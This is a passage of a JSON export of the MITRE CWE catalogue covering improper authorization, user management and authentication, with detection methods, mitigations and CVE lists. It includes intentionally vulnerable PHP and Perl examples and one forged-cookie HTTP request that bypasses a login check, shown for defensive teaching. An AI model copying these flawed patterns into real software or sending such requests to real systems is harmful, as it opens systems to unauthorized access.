data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic"},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer","Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-95"},"Intro_Text":"This function runs an arbitrary SQL query on a given database, returning the result of the query.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function runEmployeeQuery($dbName, $name){}$employeeRecord = runEmployeeQuery(\'EmployeeDB\',$_GET[\'EmployeeName\']);","xhtml:div":{"#text":"mysql_select_db($dbName,$globalDbHandle) or die(\\"Could not open Database\\".$dbName);$preparedStatement = $globalDbHandle-&gt;prepare(\'SELECT * FROM employees WHERE name = :name\');$preparedStatement-&gt;execute(array(\':name\' =&gt; $name));return $preparedStatement-&gt;fetchAll();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"//Use a prepared statement to avoid CWE-89"},"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-96"},"Intro_Text":"The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub DisplayPrivateMessage {}my $q = new CGI;if (! AuthenticateUser($q-&gt;param(\'username\'), $q-&gt;param(\'password\'))) {}my $id = $q-&gt;param(\'id\');DisplayPrivateMessage($id);","xhtml:div":[{"#text":"my($id) = @_;my $Message = LookupMessageObject($id);print \\"From: \\" . encodeHTML($Message-&gt;{from}) . \\"&lt;br&gt;\\\\n\\";print \\"Subject: \\" . encodeHTML($Message-&gt;{subject}) . \\"\\\\n\\";print \\"&lt;hr&gt;\\\\n\\";print \\"Body: \\" . encodeHTML($Message-&gt;{body}) . \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"ExitError(\\"invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","","","","","",""],"xhtml:i":["# For purposes of this example, assume that CWE-309 and","# CWE-523 do not apply."]}},"Body_Text":["While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.","One way to avoid this problem would be to ensure that the \\"to\\" field in the message object matches the username of the authenticated user."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3168","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168"},{"Reference":"CVE-2009-2960","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960"},{"Reference":"CVE-2009-3597","Description":"Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597"},{"Reference":"CVE-2009-2282","Description":"Terminal server does not check authorization for guest access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282"},{"Reference":"CVE-2009-3230","Description":"Database server does not use appropriate privileges for certain sensitive operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-5027","Description":"System monitoring software allows users to bypass authorization by creating custom forms.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2009-3781","Description":"Content management system does not check access permissions for private files, allowing others to view those files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2008-6548","Description":"Product does not check the ACL of a page accessed using an \\"include\\" directive, allowing attackers to read unauthorized files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548"},{"Reference":"CVE-2007-2925","Description":"Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-3623","Description":"OS kernel does not check for a certain privilege before setting ACLs for files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing Access Control"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP35","Entry_Name":"Insecure resource access"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"402"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"5"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"647"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"77"}},{"attr":{"@_CAPEC_ID":"87"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authorization&#34; Page 114; Chapter 6, &#34;Determining&#xA;                  Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authorization&#34;, Page 39"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;ACL Inheritance&#34;, Page 649"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-24","Modification_Importance":"Critical","Modification_Comment":"Changed name and description; clarified difference between \\"access control\\" and \\"authorization.\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Background_Details, Demonstrative_Examples, Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Missing or Inconsistent Access Control","attr":{"@_Date":"2009-01-12"}},{"#text":"Improper Access Control (Authorization)","attr":{"@_Date":"2011-03-29"}}]}},"286":{"attr":{"@_ID":"286","@_Name":"Incorrect User Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly manage a user within its environment.","Extended_Description":"Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"User management errors"}},"Notes":{"Note":[{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}},{"#text":"This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or \\"configuration\\". It also might be better expressed as a category than a weakness.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"User Management Issues","attr":{"@_Date":"2008-09-09"}}}},"287":{"attr":{"@_ID":"287","@_Name":"Improper Authentication","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"authentification","Description":"An alternate term is \\"authentification\\", which appears to be most commonly used by people from non-English-speaking countries."},{"Term":"AuthN","Description":"\\"AuthN\\" is typically used as an abbreviation of \\"authentication\\" within the web application security community. It is also distinct from \\"AuthZ,\\" which is an abbreviation of \\"authorization.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."},{"Term":"AuthC","Description":"\\"AuthC\\" is used as an abbreviation of \\"authentication,\\" but it appears to used less frequently than \\"AuthN.\\""}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Read Application Data","Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting certain types of authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.","Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives."]},"Effectiveness":"Limited"},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Static Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Manual static analysis is useful for evaluating the correctness of custom authentication mechanisms."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an authentication framework or library such as the OWASP ESAPI Authentication feature."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to \\"remember\\" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the \\"Administrator\\" username, as recorded in the user cookie.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $q = new CGI;if ($q-&gt;cookie(\'loggedin\') ne \\"true\\") {}if ($q-&gt;cookie(\'user\') eq \\"Administrator\\") {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (! AuthenticateUser($q-&gt;param(\'username\'), $q-&gt;param(\'password\'))) {}else {}","xhtml:div":[{"#text":"ExitError(\\"Error: you need to log in first\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"# Set loggedin and user cookies.$q-&gt;cookie($q-&gt;cookie(","xhtml:br":["",""],"xhtml:div":[{"#text":"-name =&gt; \'loggedin\',-value =&gt; \'true\');","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"-name =&gt; \'user\',-value =&gt; $q-&gt;param(\'username\'));","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}],"xhtml:br":""}},{"#text":"DoAdministratorTasks();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"GET /cgi-bin/vulnerable.cgi HTTP/1.1Cookie: user=AdministratorCookie: loggedin=true[body of request]","xhtml:br":["","","",""]}}],"Body_Text":["Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as:","By setting the loggedin cookie to \\"true\\", the attacker bypasses the entire authentication check. By using the \\"Administrator\\" value in the user cookie, the attacker also gains privileges to administer the software."]},{"attr":{"@_Demonstrative_Example_ID":"DX-117"},"Intro_Text":"In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts. The attacker targeted a member of Twitter\'s support team and was able to successfully guess the member\'s password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-236"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3421","Description":"login script for guestbook allows bypassing authentication by setting a 